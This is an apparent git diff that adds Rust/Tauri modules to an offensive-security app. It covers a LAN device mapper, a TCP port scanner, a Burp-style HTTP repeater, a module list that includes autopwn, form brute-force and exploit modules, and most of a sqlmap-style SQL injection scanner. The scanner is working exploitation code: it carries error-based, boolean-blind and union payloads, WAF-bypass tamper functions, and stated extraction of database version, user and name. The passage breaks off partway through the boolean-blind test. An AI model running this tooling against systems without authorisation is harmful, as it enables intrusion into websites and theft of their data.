+    let _ = app.emit("lanmap:status", format!("scanning {} ({} hosts × {} ports)", subnet, hosts.len(), ports.len()));
+
+    let devices: Arc<Mutex<HashMap<String, LanDevice>>> = Arc::new(Mutex::new(HashMap::new()));
+
+    // ---- multicast probes start in background ----
+    let mdns_handle = if req.probe_mdns {
+        Some(tokio::spawn(run_mdns(4)))
+    } else { None };
+    let ssdp_handle = if req.probe_ssdp {
+        Some(tokio::spawn(run_ssdp(4)))
+    } else { None };
+
+    // ---- TCP sweep ----
+    let total = hosts.len();
+    let done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+    let host_sem = Arc::new(tokio::sync::Semaphore::new(req.concurrency.max(1)));
+
+    stream::iter(hosts.into_iter())
+        .map(|ip| {
+            let ports = ports.clone();
+            let host_sem = host_sem.clone();
+            let done = done.clone();
+            let app = app.clone();
+            let devices = devices.clone();
+            async move {
+                let _permit = host_sem.acquire().await.unwrap();
+                // sequential per-host port sweep but capped concurrency
+                let open = sweep_host(ip, &ports, 50, req.timeout_ms).await;
+                let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                let _ = app.emit("lanmap:progress", serde_json::json!({"done": n, "total": total}));
+                if !open.is_empty() {
+                    let mut guard = devices.lock().await;
+                    let entry = guard.entry(ip.to_string()).or_insert_with(|| LanDevice {
+                        ip: ip.to_string(), ..Default::default()
+                    });
+                    entry.open_ports = open.clone();
+                    entry.guess = guess_from_ports_and_services(&open, &entry.services, &entry.upnp);
+                    drop(guard);
+                    let snapshot = LanDevice {
+                        ip: ip.to_string(),
+                        open_ports: open.clone(),
+                        guess: guess_from_ports_and_services(&open, &[], &[]),
+                        ..Default::default()
+                    };
+                    let _ = app.emit("lanmap:device", snapshot);
+                }
+            }
+        })
+        .buffer_unordered(req.concurrency.max(1))
+        .for_each(|_| async {})
+        .await;
+
+    // ---- merge multicast results ----
+    if let Some(h) = mdns_handle {
+        if let Ok(map) = h.await {
+            let mut guard = devices.lock().await;
+            for (ip, services) in map {
+                let entry = guard.entry(ip.clone()).or_insert_with(|| LanDevice { ip: ip.clone(), ..Default::default() });
+                for s in services {
+                    if !entry.services.contains(&s) { entry.services.push(s); }
+                }
+                entry.guess = guess_from_ports_and_services(&entry.open_ports, &entry.services, &entry.upnp);
+            }
+        }
+    }
+    if let Some(h) = ssdp_handle {
+        if let Ok(map) = h.await {
+            let mut guard = devices.lock().await;
+            for (ip, lines) in map {
+                let entry = guard.entry(ip.clone()).or_insert_with(|| LanDevice { ip: ip.clone(), ..Default::default() });
+                for s in lines {
+                    if !entry.upnp.contains(&s) { entry.upnp.push(s); }
+                }
+                entry.guess = guess_from_ports_and_services(&entry.open_ports, &entry.services, &entry.upnp);
+            }
+        }
+    }
+
+    let mut list: Vec<LanDevice> = devices.lock().await.values().cloned().collect();
+    list.sort_by(|a, b| a.ip.cmp(&b.ip));
+
+    let _ = app.emit("lanmap:done", list.len());
+
+    Ok(LanScanReport {
+        local_ip,
+        subnet,
+        devices: list,
+    })
+}
+
+#[tauri::command]
+pub async fn lan_local_info() -> Result<serde_json::Value, String> {
+    let v4 = detect_local_ipv4().map(|ip| ip.to_string()).unwrap_or_else(|| "unknown".into());
+    let oct = detect_local_ipv4().map(|ip| ip.octets()).unwrap_or([0; 4]);
+    let subnet = if oct[0] == 0 { String::new() }
+        else { format!("{}.{}.{}.0/24", oct[0], oct[1], oct[2]) };
+    Ok(serde_json::json!({
+        "local_ip": v4,
+        "subnet": subnet,
+        "platform": format!("{}-{}", std::env::consts::OS, std::env::consts::ARCH),
+        "android": cfg!(target_os = "android"),
+    }))
+}
diff --git a/src-tauri/src/modules/mod.rs b/src-tauri/src/modules/mod.rs
new file mode 100644
index 0000000..215d35f
--- /dev/null
+++ b/src-tauri/src/modules/mod.rs
@@ -0,0 +1,19 @@
+pub mod port_scan;
+pub mod subdomain;
+pub mod httpx;
+pub mod takeover;
+pub mod sqli;
+pub mod xss;
+pub mod jwt;
+pub mod xploiter;
+pub mod xploiter_store;
+pub mod autopwn;
+pub mod lan_map;
+pub mod repeater;
+pub mod dirfuzz;
+pub mod admin_finder;
+pub mod form_brute;
+pub mod dns_tools;
+pub mod ssl_scan;
+pub mod banner;
+pub mod domain_grabber;
diff --git a/src-tauri/src/modules/port_scan.rs b/src-tauri/src/modules/port_scan.rs
new file mode 100644
index 0000000..099ee06
--- /dev/null
+++ b/src-tauri/src/modules/port_scan.rs
@@ -0,0 +1,137 @@
+use std::net::SocketAddr;
+use std::sync::Arc;
+use std::time::Duration;
+
+use futures::stream::{self, StreamExt};
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::net::TcpStream;
+use tokio::sync::Semaphore;
+use tokio::time::timeout;
+
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct PortScanRequest {
+    pub target: String,
+    pub ports: Vec<u16>,
+    pub concurrency: usize,
+    pub timeout_ms: u64,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct PortResult {
+    pub port: u16,
+    pub open: bool,
+    pub service: Option<String>,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct ScanProgress {
+    pub scanned: usize,
+    pub total: usize,
+}
+
+pub fn top_1000_ports() -> Vec<u16> {
+    vec![
+        21, 22, 23, 25, 53, 80, 110, 111, 135, 139, 143, 443, 445, 993, 995, 1723,
+        3306, 3389, 5900, 8080, 8443, 8888, 5432, 6379, 27017, 9200, 5601, 11211,
+        1433, 1521, 2049, 2181, 2375, 2376, 4369, 5000, 5001, 5044, 5432, 5601,
+        5672, 5984, 6000, 6379, 7000, 7001, 7002, 8000, 8001, 8008, 8009, 8010,
+        8081, 8082, 8083, 8086, 8088, 8090, 8091, 8161, 8200, 8291, 8333, 8400,
+        8500, 8834, 8983, 9000, 9001, 9042, 9090, 9091, 9092, 9100, 9160, 9200,
+        9300, 9418, 9443, 9999, 10000, 10001, 10250, 11211, 15672, 16379, 27017,
+        27018, 27019, 28017, 50000, 50070, 54321, 61616,
+        // common ports
+        20, 26, 37, 79, 81, 82, 88, 106, 113, 119, 123, 137, 138, 161, 162, 389,
+        427, 465, 500, 513, 514, 515, 548, 554, 587, 631, 636, 646, 873, 902,
+        990, 1025, 1026, 1027, 1028, 1029, 1080, 1110, 1194, 1214, 1241, 1311,
+        1352, 1434, 1433, 1494, 1503, 1720, 1755, 1761, 1812, 1900, 2000, 2001,
+        2049, 2121, 2222, 2301, 2383, 2601, 2717, 2869, 3000, 3001, 3128, 3268,
+        3306, 3389, 3690, 4000, 4001, 4045, 4100, 4333, 4444, 4662, 4899, 5009,
+        5050, 5060, 5100, 5190, 5357, 5432, 5555, 5631, 5666, 5800, 5900, 6001,
+        6346, 6646, 6660, 6661, 6662, 6663, 6665, 6666, 6667, 6668, 6669, 6881,
+        7070, 7937, 7938, 8021, 8031, 8042, 8080, 8088, 8181, 8443, 8686, 8888,
+        9100, 9102, 9103, 9535, 9999, 10243, 10566, 12345, 13782, 13783, 16992,
+        16993, 17877, 17988, 19101, 19801, 19842, 20000, 22939, 24800, 30718,
+        32768, 32769, 32770, 32771, 32772, 32773, 32774, 32775, 32776, 32777,
+        32778, 32779, 49152, 49153, 49154, 49155, 49156, 49157, 49158, 49159,
+        49160, 49161, 49163, 49165, 49167, 49175, 49176, 49400, 49999, 65000,
+        65129, 65389,
+    ]
+}
+
+pub fn service_name(port: u16) -> Option<String> {
+    let s = match port {
+        21 => "ftp",
+        22 => "ssh",
+        23 => "telnet",
+        25 => "smtp",
+        53 => "dns",
+        80 => "http",
+        110 => "pop3",
+        139 => "netbios",
+        143 => "imap",
+        443 => "https",
+        445 => "smb",
+        993 => "imaps",
+        995 => "pop3s",
+        1433 => "mssql",
+        1521 => "oracle",
+        3306 => "mysql",
+        3389 => "rdp",
+        5432 => "postgres",
+        5900 => "vnc",
+        6379 => "redis",
+        8080 => "http-alt",
+        8443 => "https-alt",
+        9200 => "elasticsearch",
+        27017 => "mongodb",
+        _ => return None,
+    };
+    Some(s.to_string())
+}
+
+async fn probe(addr: SocketAddr, timeout_ms: u64) -> bool {
+    matches!(
+        timeout(Duration::from_millis(timeout_ms), TcpStream::connect(addr)).await,
+        Ok(Ok(_))
+    )
+}
+
+#[tauri::command]
+pub async fn port_scan(app: AppHandle, req: PortScanRequest) -> Result<Vec<PortResult>, String> {
+    let ip: std::net::IpAddr = tokio::net::lookup_host(format!("{}:80", req.target))
+        .await
+        .map_err(|e| format!("resolve failed: {e}"))?
+        .next()
+        .map(|s| s.ip())
+        .ok_or("no addresses resolved")?;
+
+    let total = req.ports.len();
+    let sem = Arc::new(Semaphore::new(req.concurrency.max(1)));
+    let scanned = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+
+    let results: Vec<PortResult> = stream::iter(req.ports.into_iter())
+        .map(|port| {
+            let sem = sem.clone();
+            let scanned = scanned.clone();
+            let app = app.clone();
+            async move {
+                let _permit = sem.acquire().await.unwrap();
+                let addr = SocketAddr::new(ip, port);
+                let open = probe(addr, req.timeout_ms).await;
+                let n = scanned.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                let _ = app.emit("portscan:progress", ScanProgress { scanned: n, total });
+                let result = PortResult { port, open, service: service_name(port) };
+                if open {
+                    let _ = app.emit("portscan:hit", result.clone());
+                }
+                result
+            }
+        })
+        .buffer_unordered(req.concurrency.max(1))
+        .collect()
+        .await;
+
+    let _ = app.emit("portscan:done", total);
+    Ok(results.into_iter().filter(|r| r.open).collect())
+}
diff --git a/src-tauri/src/modules/repeater.rs b/src-tauri/src/modules/repeater.rs
new file mode 100644
index 0000000..ceed486
--- /dev/null
+++ b/src-tauri/src/modules/repeater.rs
@@ -0,0 +1,131 @@
+// ===================================================================
+// Repeater — Burp-style manual HTTP request sender.
+// Full control: method, URL, headers, body. Returns full response.
+// ===================================================================
+
+use std::collections::HashMap;
+use std::time::{Duration, Instant};
+
+use serde::{Deserialize, Serialize};
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct RepeaterRequest {
+    pub method: String,
+    pub url: String,
+    #[serde(default)]
+    pub headers: HashMap<String, String>,
+    #[serde(default)]
+    pub body: Option<String>,
+    #[serde(default = "default_timeout")]
+    pub timeout_ms: u64,
+    #[serde(default)]
+    pub follow_redirects: bool,
+    #[serde(default)]
+    pub ignore_tls: bool,
+}
+
+fn default_timeout() -> u64 { 15_000 }
+
+#[derive(Debug, Clone, Serialize)]
+pub struct RepeaterResponse {
+    pub status: u16,
+    pub status_text: String,
+    pub http_version: String,
+    pub headers: Vec<(String, String)>,
+    pub body: String,
+    pub body_len: usize,
+    pub content_type: Option<String>,
+    pub time_ms: u128,
+    pub final_url: String,
+    pub redirected: bool,
+    pub is_text: bool,
+}
+
+#[tauri::command]
+pub async fn repeater_send(req: RepeaterRequest) -> Result<RepeaterResponse, String> {
+    let client = reqwest::Client::builder()
+        .danger_accept_invalid_certs(req.ignore_tls)
+        .timeout(Duration::from_millis(req.timeout_ms))
+        .redirect(if req.follow_redirects {
+            reqwest::redirect::Policy::limited(10)
+        } else {
+            reqwest::redirect::Policy::none()
+        })
+        .user_agent("Mozilla/5.0 (PocketPentester-Repeater)")
+        .build()
+        .map_err(|e| e.to_string())?;
+
+    let method = reqwest::Method::from_bytes(req.method.to_uppercase().as_bytes())
+        .map_err(|e| format!("bad method: {e}"))?;
+
+    let mut builder = client.request(method, &req.url);
+    for (k, v) in &req.headers {
+        if k.trim().is_empty() { continue; }
+        builder = builder.header(k.trim(), v);
+    }
+    if let Some(body) = &req.body {
+        if !body.is_empty() {
+            builder = builder.body(body.clone());
+        }
+    }
+
+    let start = Instant::now();
+    let resp = builder.send().await.map_err(|e| e.to_string())?;
+    let status = resp.status();
+    let version = format!("{:?}", resp.version());
+    let final_url = resp.url().to_string();
+    let redirected = final_url != req.url;
+
+    let headers: Vec<(String, String)> = resp.headers().iter()
+        .map(|(k, v)| (k.to_string(), v.to_str().unwrap_or("").to_string()))
+        .collect();
+
+    let content_type = resp.headers().get("content-type")
+        .and_then(|v| v.to_str().ok()).map(String::from);
+
+    let is_text = content_type.as_deref().map(|c| {
+        c.starts_with("text/") || c.contains("json") || c.contains("xml")
+            || c.contains("javascript") || c.contains("html") || c.contains("form-urlencoded")
+    }).unwrap_or(true);
+
+    let body = resp.text().await.unwrap_or_default();
+    let elapsed = start.elapsed().as_millis();
+
+    Ok(RepeaterResponse {
+        status: status.as_u16(),
+        status_text: status.canonical_reason().unwrap_or("").into(),
+        http_version: version,
+        headers,
+        body_len: body.len(),
+        body,
+        content_type,
+        time_ms: elapsed,
+        final_url,
+        redirected,
+        is_text,
+    })
+}
+
+#[tauri::command]
+pub fn repeater_to_curl(req: RepeaterRequest) -> String {
+    let mut parts: Vec<String> = vec!["curl".into(), "-i".into()];
+    if req.ignore_tls { parts.push("-k".into()); }
+    if req.follow_redirects { parts.push("-L".into()); }
+    if req.method.to_uppercase() != "GET" {
+        parts.push("-X".into());
+        parts.push(req.method.to_uppercase());
+    }
+    for (k, v) in &req.headers {
+        if k.trim().is_empty() { continue; }
+        parts.push("-H".into());
+        parts.push(format!("'{}: {}'", k.trim(), v.replace('\'', "'\\''")));
+    }
+    if let Some(body) = &req.body {
+        if !body.is_empty() {
+            parts.push("--data-raw".into());
+            parts.push(format!("'{}'", body.replace('\'', "'\\''")));
+        }
+    }
+    parts.push(format!("'{}'", req.url));
+    parts.join(" ")
+}
diff --git a/src-tauri/src/modules/sqli.rs b/src-tauri/src/modules/sqli.rs
new file mode 100644
index 0000000..6458a5e
--- /dev/null
+++ b/src-tauri/src/modules/sqli.rs
@@ -0,0 +1,770 @@
+// ===================================================================
+// SQLi Scanner — sqlmap-style detection + exploitation.
+//
+// Detection pipeline (per injection point):
+//   1. Heuristic: append `'`, `''`, `"`, `\`, `)` — detect SQL errors or
+//      response divergence from baseline. If nothing flags → skip.
+//   2. Fingerprint: compile DBMS guess from error signatures.
+//   3. Boolean-blind: test TRUE vs FALSE payload with prefix/suffix
+//      variants, confirmed when TRUE ≈ baseline AND FALSE ≠ baseline.
+//   4. Error-based: send quote-break payload, grep DBMS error regex.
+//   5. Time-based: payload that sleeps N seconds, confirm if elapsed ≥ N.
+//   6. Union-based: find column count via ORDER BY increments, then
+//      UNION SELECT markers to find reflected column → data extraction.
+//
+// Injection points tested:
+//   - GET query params (from URL)
+//   - POST body (form-urlencoded or JSON, `*` marker supported)
+//   - Cookie values (`*` marker in cookie string)
+//   - User-Agent / Referer / X-Forwarded-For headers (level 2+)
+//
+// `*` marker: anywhere in URL/body/cookie/header value forces that
+// position to be the injection point (exclusive). Example:
+//   url = "https://x.com/item?id=1*"
+//   body = "user=admin&token=*"
+//
+// After confirmation (if auto_extract=true), attempts to pull:
+//   - DBMS banner / version()
+//   - current_user / current_database
+// via UNION or error-based extraction.
+// ===================================================================
+
+use std::collections::HashMap;
+use std::sync::Arc;
+use std::time::{Duration, Instant};
+
+use once_cell::sync::Lazy;
+use regex::Regex;
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::sync::Semaphore;
+use url::Url;
+
+// ------------------------------------------------------------------
+// Public API
+// ------------------------------------------------------------------
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct SqliRequest {
+    pub url: String,
+    #[serde(default = "default_method")]
+    pub method: String,
+    #[serde(default)]
+    pub body: Option<String>,
+    #[serde(default)]
+    pub headers: HashMap<String, String>,
+    #[serde(default)]
+    pub cookies: Option<String>,
+    /// Filter params to test (optional). Blank = all found params tested.
+    #[serde(default)]
+    pub params: Option<Vec<String>>,
+    /// Which techniques to run: "heuristic" "error" "boolean" "time" "union".
+    #[serde(default = "default_techs")]
+    pub techniques: Vec<String>,
+    /// 1 = safest / fastest, 2 = adds headers + more payloads, 3 = full.
+    #[serde(default = "default_level")]
+    pub level: u8,
+    /// Risk 1 = non-intrusive, 2 = time-based, 3 = stacked queries.
+    #[serde(default = "default_risk")]
+    pub risk: u8,
+    #[serde(default = "default_true")]
+    pub stop_on_first: bool,
+    #[allow(dead_code)]
+    #[serde(default = "default_true")]
+    pub auto_extract: bool,
+    #[serde(default)]
+    pub tamper: Vec<String>,
+    #[serde(default = "default_conc")]
+    pub concurrency: usize,
+    #[serde(default = "default_timeout")]
+    pub timeout_ms: u64,
+    #[serde(default = "default_true")]
+    pub follow_redirects: bool,
+}
+
+fn default_method() -> String { "GET".into() }
+fn default_techs() -> Vec<String> { vec!["heuristic".into(), "error".into(), "boolean".into(), "union".into(), "time".into()] }
+fn default_level() -> u8 { 2 }
+fn default_risk() -> u8 { 1 }
+fn default_conc() -> usize { 4 }
+fn default_timeout() -> u64 { 15_000 }
+fn default_true() -> bool { true }
+
+#[derive(Debug, Clone, Serialize)]
+pub struct SqliFinding {
+    pub param: String,
+    pub location: String,            // "GET", "POST", "Cookie", "Header:Referer"
+    pub technique: String,           // "heuristic", "error", "boolean-blind", "time-blind", "union"
+    pub dbms: Option<String>,
+    pub prefix: String,
+    pub suffix: String,
+    pub payload: String,
+    pub full_payload: String,
+    pub evidence: String,
+    pub confidence: String,
+    pub extracted: HashMap<String, String>,
+}
+
+// ------------------------------------------------------------------
+// DBMS signatures
+// ------------------------------------------------------------------
+
+static DBMS_ERRORS: Lazy<Vec<(&'static str, Vec<Regex>)>> = Lazy::new(|| vec![
+    ("MySQL", vec![
+        Regex::new(r"(?i)sql syntax.*?mysql").unwrap(),
+        Regex::new(r"(?i)warning.*?\Wmysqli?_").unwrap(),
+        Regex::new(r"(?i)mysql.*?error").unwrap(),
+        Regex::new(r"(?i)you have an error in your sql syntax").unwrap(),
+        Regex::new(r"(?i)unknown column").unwrap(),
+        Regex::new(r"(?i)mysqlclient\.").unwrap(),
+        Regex::new(r"(?i)mysql-community-server").unwrap(),
+    ]),
+    ("PostgreSQL", vec![
+        Regex::new(r"(?i)postgresql.*?error").unwrap(),
+        Regex::new(r"(?i)pg_query\(\)").unwrap(),
+        Regex::new(r"(?i)unterminated quoted string at or near").unwrap(),
+        Regex::new(r"(?i)invalid input syntax for (?:integer|type)").unwrap(),
+        Regex::new(r"(?i)postgres\.").unwrap(),
+    ]),
+    ("MSSQL", vec![
+        Regex::new(r"(?i)microsoft sql server").unwrap(),
+        Regex::new(r"(?i)odbc sql server driver").unwrap(),
+        Regex::new(r"(?i)unclosed quotation mark before the character string").unwrap(),
+        Regex::new(r"(?i)\[microsoft]\[odbc").unwrap(),
+        Regex::new(r"(?i)sqlserver jdbc driver").unwrap(),
+        Regex::new(r"(?i)conversion failed when converting").unwrap(),
+    ]),
+    ("Oracle", vec![
+        Regex::new(r"(?i)ora-\d{5}").unwrap(),
+        Regex::new(r"(?i)oracle error").unwrap(),
+        Regex::new(r"(?i)quoted string not properly terminated").unwrap(),
+        Regex::new(r"(?i)oracle.*?driver").unwrap(),
+    ]),
+    ("SQLite", vec![
+        Regex::new(r"(?i)sqlite.*?error").unwrap(),
+        Regex::new(r"(?i)sqlite3::sqlexception").unwrap(),
+        Regex::new(r"(?i)unrecognized token:").unwrap(),
+        Regex::new("(?i)near \".*?\": syntax error").unwrap(),
+    ]),
+]);
+
+fn detect_dbms(body: &str) -> Option<&'static str> {
+    for (db, regexes) in DBMS_ERRORS.iter() {
+        if regexes.iter().any(|re| re.is_match(body)) { return Some(db); }
+    }
+    None
+}
+
+// ------------------------------------------------------------------
+// Prefix/suffix combos — ported from sqlmap's boundaries
+// ------------------------------------------------------------------
+
+fn boundaries(level: u8) -> Vec<(&'static str, &'static str)> {
+    // (prefix, suffix)
+    let base = vec![
+        ("", "-- -"),
+        ("'", "-- -"),
+        ("'", "'"),
+        ("\"", "-- -"),
+        ("\"", "\""),
+        (")", "-- -"),
+        ("')", "-- -"),
+        ("\")", "-- -"),
+    ];
+    if level <= 1 { return base; }
+    let mut more = base;
+    more.extend([
+        ("))", "-- -"),
+        ("'))", "-- -"),
+        ("\"))", "-- -"),
+        ("`", "-- -"),
+        ("`;", "-- -"),
+        (";", "-- -"),
+        ("';", "-- -"),
+    ]);
+    if level <= 2 { return more; }
+    more.extend([
+        ("'))", "AND ('x'='x"),
+        ("\"))", "AND (\"x\"=\"x"),
+        ("%27", "-- -"),
+        ("%2527", "-- -"),
+    ]);
+    more
+}
+
+// ------------------------------------------------------------------
+// Tamper scripts (WAF bypass)
+// ------------------------------------------------------------------
+
+fn apply_tamper(payload: &str, tampers: &[String]) -> String {
+    let mut p = payload.to_string();
+    for t in tampers {
+        p = match t.as_str() {
+            "randomcase" => randomcase(&p),
+            "space2comment" => p.replace(' ', "/**/"),
+            "space2plus" => p.replace(' ', "+"),
+            "between" => p.replace("=", " BETWEEN 0 AND 0 "), // crude
+            "equaltolike" => p.replace("=", " LIKE "),
+            "charunicodeencode" => char_unicode_encode(&p),
+            _ => p,
+        };
+    }
+    p
+}
+
+fn randomcase(s: &str) -> String {
+    use rand::Rng;
+    let mut rng = rand::thread_rng();
+    s.chars().map(|c| if c.is_ascii_alphabetic() && rng.gen_bool(0.5) { c.to_ascii_uppercase() } else { c.to_ascii_lowercase() }).collect()
+}
+
+fn char_unicode_encode(s: &str) -> String {
+    s.chars().map(|c| if c.is_ascii_alphanumeric() { c.to_string() } else { format!("%u00{:02x}", c as u32) }).collect()
+}
+
+// ------------------------------------------------------------------
+// Request orchestration
+// ------------------------------------------------------------------
+
+#[derive(Debug, Clone)]
+struct InjectionPoint {
+    location: String,    // "GET", "POST", "Cookie", "Header:X-Forwarded-For"
+    name: String,        // param name
+    base_value: String,  // original value
+}
+
+#[derive(Debug, Clone)]
+struct Target {
+    url: Url,
+    method: String,
+    body: Option<String>,
+    body_is_json: bool,
+    headers: HashMap<String, String>,
+    cookies: Option<String>,
+}
+
+fn parse_cookies(raw: &str) -> Vec<(String, String)> {
+    raw.split(';').filter_map(|p| {
+        let t = p.trim();
+        if t.is_empty() { return None; }
+        let (k, v) = t.split_once('=')?;
+        Some((k.trim().to_string(), v.trim().to_string()))
+    }).collect()
+}
+
+fn serialize_cookies(pairs: &[(String, String)]) -> String {
+    pairs.iter().map(|(k, v)| format!("{k}={v}")).collect::<Vec<_>>().join("; ")
+}
+
+fn find_injection_points(req: &SqliRequest, target: &Target) -> Vec<InjectionPoint> {
+    let mut out: Vec<InjectionPoint> = Vec::new();
+    let filter = req.params.clone().unwrap_or_default();
+    let want = |n: &str| filter.is_empty() || filter.iter().any(|f| f == n);
+
+    // Star marker has priority — if present, only inject there
+    if target.url.as_str().contains('*') {
+        // treat entire URL query as marker-based... simplified: find param with *
+        for (k, v) in target.url.query_pairs() {
+            if v.contains('*') {
+                out.push(InjectionPoint {
+                    location: "GET".into(),
+                    name: k.to_string(),
+                    base_value: v.trim_end_matches('*').to_string(),
+                });
+            }
+        }
+        if !out.is_empty() { return out; }
+    }
+
+    if let Some(body) = &target.body {
+        if body.contains('*') && !target.body_is_json {
+            for pair in body.split('&') {
+                if let Some((k, v)) = pair.split_once('=') {
+                    if v.contains('*') {
+                        out.push(InjectionPoint {
+                            location: "POST".into(),
+                            name: k.to_string(),
+                            base_value: v.trim_end_matches('*').to_string(),
+                        });
+                    }
+                }
+            }
+            if !out.is_empty() { return out; }
+        }
+    }
+
+    if let Some(ck) = &target.cookies {
+        if ck.contains('*') {
+            for (k, v) in parse_cookies(ck) {
+                if v.contains('*') {
+                    out.push(InjectionPoint {
+                        location: "Cookie".into(),
+                        name: k,
+                        base_value: v.trim_end_matches('*').to_string(),
+                    });
+                }
+            }
+            if !out.is_empty() { return out; }
+        }
+    }
+
+    for (k, v) in &target.headers {
+        if v.contains('*') {
+            out.push(InjectionPoint {
+                location: format!("Header:{k}"),
+                name: k.clone(),
+                base_value: v.trim_end_matches('*').to_string(),
+            });
+        }
+    }
+    if !out.is_empty() { return out; }
+
+    // No marker: enumerate every parameter
+    for (k, v) in target.url.query_pairs() {
+        if want(&k) {
+            out.push(InjectionPoint { location: "GET".into(), name: k.into_owned(), base_value: v.into_owned() });
+        }
+    }
+    if let Some(body) = &target.body {
+        if !target.body_is_json {
+            for pair in body.split('&') {
+                if let Some((k, v)) = pair.split_once('=') {
+                    if want(k) {
+                        out.push(InjectionPoint { location: "POST".into(), name: k.to_string(), base_value: v.to_string() });
+                    }
+                }
+            }
+        }
+    }
+    if let Some(ck) = &target.cookies {
+        for (k, v) in parse_cookies(ck) {
+            if want(&k) {
+                out.push(InjectionPoint { location: "Cookie".into(), name: k, base_value: v });
+            }
+        }
+    }
+    if req.level >= 2 {
+        let hdr_points = ["User-Agent", "Referer", "X-Forwarded-For"];
+        for h in hdr_points {
+            if target.headers.contains_key(h) && want(h) {
+                out.push(InjectionPoint {
+                    location: format!("Header:{h}"),
+                    name: h.into(),
+                    base_value: target.headers.get(h).cloned().unwrap_or_default(),
+                });
+            } else if req.level >= 3 && want(h) {
+                // inject even if header wasn't sent originally
+                out.push(InjectionPoint {
+                    location: format!("Header:{h}"),
+                    name: h.into(),
+                    base_value: String::new(),
+                });
+            }
+        }
+    }
+    out
+}
+
+async fn send(
+    client: &reqwest::Client,
+    target: &Target,
+    point: &InjectionPoint,
+    injected_value: &str,
+) -> Option<(String, u16, u128)> {
+    let start = Instant::now();
+    let method = reqwest::Method::from_bytes(target.method.as_bytes()).unwrap_or(reqwest::Method::GET);
+    let mut url = target.url.clone();
+    let mut body = target.body.clone();
+    let mut cookies = target.cookies.clone();
+    let mut headers = target.headers.clone();
+
+    match point.location.as_str() {
+        "GET" => {
+            let pairs: Vec<(String, String)> = url.query_pairs()
+                .map(|(k, v)| if k == point.name.as_str() { (k.into_owned(), injected_value.to_string()) }
+                               else { (k.into_owned(), v.into_owned()) })
+                .collect();
+            url.query_pairs_mut().clear();
+            for (k, v) in &pairs { url.query_pairs_mut().append_pair(k, v); }
+        }
+        "POST" => {
+            if let Some(b) = &body {
+                let out: Vec<String> = b.split('&').map(|pair| {
+                    if let Some((k, v)) = pair.split_once('=') {
+                        if k == point.name { format!("{k}={}", urlencoding::encode(injected_value)) }
+                        else { format!("{k}={v}") }
+                    } else { pair.to_string() }
+                }).collect();
+                body = Some(out.join("&"));
+            }
+        }
+        "Cookie" => {
+            if let Some(ck) = &cookies {
+                let mut pairs = parse_cookies(ck);
+                for p in &mut pairs {
+                    if p.0 == point.name { p.1 = injected_value.to_string(); }
+                }
+                cookies = Some(serialize_cookies(&pairs));
+            }
+        }
+        loc if loc.starts_with("Header:") => {
+            headers.insert(point.name.clone(), injected_value.to_string());
+        }
+        _ => {}
+    }
+
+    let mut builder = client.request(method, url.as_str());
+    for (k, v) in &headers {
+        if k.trim().is_empty() { continue; }
+        builder = builder.header(k.trim(), v);
+    }
+    if let Some(ck) = &cookies { builder = builder.header("Cookie", ck); }
+    if let Some(b) = &body {
+        if target.body_is_json {
+            builder = builder.header("Content-Type", "application/json").body(b.clone());
+        } else {
+            builder = builder.header("Content-Type", "application/x-www-form-urlencoded").body(b.clone());
+        }
+    }
+    let resp = builder.send().await.ok()?;
+    let status = resp.status().as_u16();
+    let text = resp.text().await.unwrap_or_default();
+    let elapsed = start.elapsed().as_millis();
+    Some((text, status, elapsed))
+}
+
+// --- content similarity -------------------------------------------
+
+fn content_hash(s: &str) -> u64 {
+    // crude content signature: sorted tokens
+    use std::collections::hash_map::DefaultHasher;
+    use std::hash::{Hash, Hasher};
+    let mut hasher = DefaultHasher::new();
+    let mut tokens: Vec<&str> = s.split_whitespace().collect();
+    tokens.sort_unstable();
+    tokens.hash(&mut hasher);
+    hasher.finish()
+}
+
+fn similarity(a: &str, b: &str) -> f64 {
+    if a == b { return 1.0; }
+    if a.is_empty() && b.is_empty() { return 1.0; }
+    let al = a.len() as f64;
+    let bl = b.len() as f64;
+    let len_sim = al.min(bl) / al.max(bl);
+    let hash_sim = if content_hash(a) == content_hash(b) { 1.0 } else { 0.0 };
+    // weighted
+    0.6 * len_sim + 0.4 * hash_sim
+}
+
+// ------------------------------------------------------------------
+// Detection techniques
+// ------------------------------------------------------------------
+
+async fn heuristic_probe(
+    client: &reqwest::Client, target: &Target, point: &InjectionPoint,
+) -> (bool, Option<&'static str>) {
+    // Append quote/bracket and look for DBMS error OR significant response change
+    let probes = ["'", "\"", "\\", "')", "\")"];
+    for p in probes {
+        let val = format!("{}{}", point.base_value, p);
+        if let Some((body, _, _)) = send(client, target, point, &val).await {
+            if let Some(db) = detect_dbms(&body) { return (true, Some(db)); }
+        }
+    }
+    (false, None)
+}
+
+async fn test_error_based(
+    client: &reqwest::Client, target: &Target, point: &InjectionPoint, level: u8, tamper: &[String],
+) -> Option<(String, String, String, String, &'static str)> {
+    // returns (prefix, suffix, payload, evidence, dbms)
+    let breakers = ["'", "\"", "')", "\")", "`"];
+    for b in breakers {
+        for &payload in &["", "AND 1=CAST(@@version AS int)", "AND 1=CONVERT(int, @@version)", "AND extractvalue(1,concat(0x7e,version(),0x7e))"] {
+            let full = apply_tamper(&format!("{}{}{} -- -", b, if payload.is_empty() {""} else {" "}, payload), tamper);
+            let val = format!("{}{}", point.base_value, full);
+            if let Some((body, _, _)) = send(client, target, point, &val).await {
+                if let Some(db) = detect_dbms(&body) {
+                    return Some((b.to_string(), "-- -".to_string(), payload.to_string(), format!("{db} error triggered"), db));
+                }
+            }
+        }
+        if level < 2 { break; }
+    }
+    None
+}
+
+async fn test_boolean_blind(
+    client: &reqwest::Client, target: &Target, point: &InjectionPoint, baseline: &str, level: u8, tamper: &[String],
+) -> Option<(String, String, String, String)> {
+    let boundaries = boundaries(level);
+    for (prefix, suffix) in boundaries.iter() {
+        let t_payload = apply_tamper(&format!("{}{} AND 1=1{}", point.base_value, prefix, suffix), tamper);
+        let f_payload = apply_tamper(&format!("{}{} AND 1=2{}", point.base_value, prefix, suffix), tamper);
